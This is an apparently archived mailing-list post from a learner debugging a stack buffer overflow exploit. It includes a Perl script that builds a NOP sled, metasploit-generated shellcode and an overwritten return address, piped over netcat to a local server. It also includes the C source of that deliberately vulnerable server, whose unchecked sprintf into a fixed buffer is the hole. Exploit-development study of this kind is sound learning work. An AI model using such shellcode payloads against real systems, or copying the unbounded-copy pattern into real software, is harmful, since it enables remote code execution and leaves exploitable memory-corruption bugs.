Exploit development issues

[0x0804 at gmail.com (curious one)]

Hi List,

Getting back on track by disabling VA space randomization, I begun with
vulnerable sample program provided with SDK. But the same story, i get an
error (bad address) and exits. So in order to keep up my spirit I took the
following program from
http://www.zone-h.org/files/32/remote_exploits.htmand started with the
exploitation process. Strangely, I could not get an
offset by using patternOffset.pl . So I started the trusted method of piping
evil buffer over NC. Generated the shellcode using metasploit and I was
relatively sucessful in that. That is to say, I was able toover write eip
with correct return address. Now the issue came when teh last two bytes of
shellcode stated producing segfaults. Can someone have a look and tell me
where am I doing wrong?

Attached screenshot is the result of the above experience. Note that the
flow control fails when it gets to \x47 which is a part of my shellcode
which was generated by metasploit.

Cheers

---------------------foo-buffer.pl---------------------------------
#!/bin/perl
#We create the buffer and pipe it to nc {perl test.pl | nc 127.0.0.1 11221}
$string ="\x90"x834;
$string.="\x2b\xc9\x83\xe9\xee\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8a".
        "\x27\x47\xb1\x83\xeb\xfc\xe2\xf4\xbb\xfc\x14\xf2\xd9\x4d\x45\xdb".
        "\xec\x7f\xce\x50\x47\xa7\xd4\xe8\x3a\x18\x8a\x31\xc3\x5e\xbe\xea".
        "\xd0\x4f\x38\xb1\x8a\x26\x21\xd9\x9a\xc6\x04\xd7\xd9\xae\xa6\x01".
        "\xec\x77\x16\xe2\x03\xc6\x04\x7c\x0a\x75\x2f\x9e\xa5\x54\x2f\xd9".
        "\xa5\x45\x2e\xdf\x03\xc4\x15\xe2\x03\xc6\xf7\xba\x47\xa7\x47\xb1";
$string.="\x90"x100;

##Return address is 0xbffff536

$string.="\x36\xf5\xff\xbf"x2;
$string.="\x00";

print $string;


------------------------vulnerable-program.c---------------

#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>


#define BUFFER_SIZE 1024
#define NAME_SIZE 2048

int handling(int c)

{
char buffer[BUFFER_SIZE], name[NAME_SIZE];
int bytes;
strcpy(buffer, "My name is: ");
bytes = send(c, buffer, strlen(buffer), 0);
if (bytes == -1)
return -1;
bytes = recv(c, name, sizeof(name), 0);
if (bytes == -1)
return -1;
name[bytes - 1] = '\0';
sprintf(buffer, "Hello %s, nice to meet you!\r\n", name);
bytes = send(c, buffer, strlen(buffer), 0);
if (bytes == -1)
return -1;
return 0;

}

int main(int argc, char *argv[])

{
int s, c, cli_size;
struct sockaddr_in srv, cli;
if (argc != 2)
{
fprintf(stderr, "usage: %s port\n", argv[0]);
return 1;
}
s = socket(AF_INET, SOCK_STREAM, 0);
if (s == -1)
{
perror("socket() failed");
return 2;
}
srv.sin_addr.s_addr = INADDR_ANY;
srv.sin_port = htons( (unsigned short int) atol(argv[1]));
srv.sin_family = AF_INET;
if (bind(s, &srv, sizeof(srv)) == -1)
{
perror("bind() failed");
return 3;
}
if (listen(s, 3) == -1)
{
perror("listen() failed");
return 4;
}
for(;;)
{
c = accept(s, NULL, 0);
if (c == -1)
{
perror("accept() failed");
return 5;
}
printf("connection received");
if (handling(c) == -1)
fprintf(stderr, "%s: handling() failed", argv[0]);
close(c);
}
return 0;

}
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20060411/a09d8b9e/attachment.htm>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: snapshot.png
Type: image/png
Size: 296054 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20060411/a09d8b9e/attachment.png>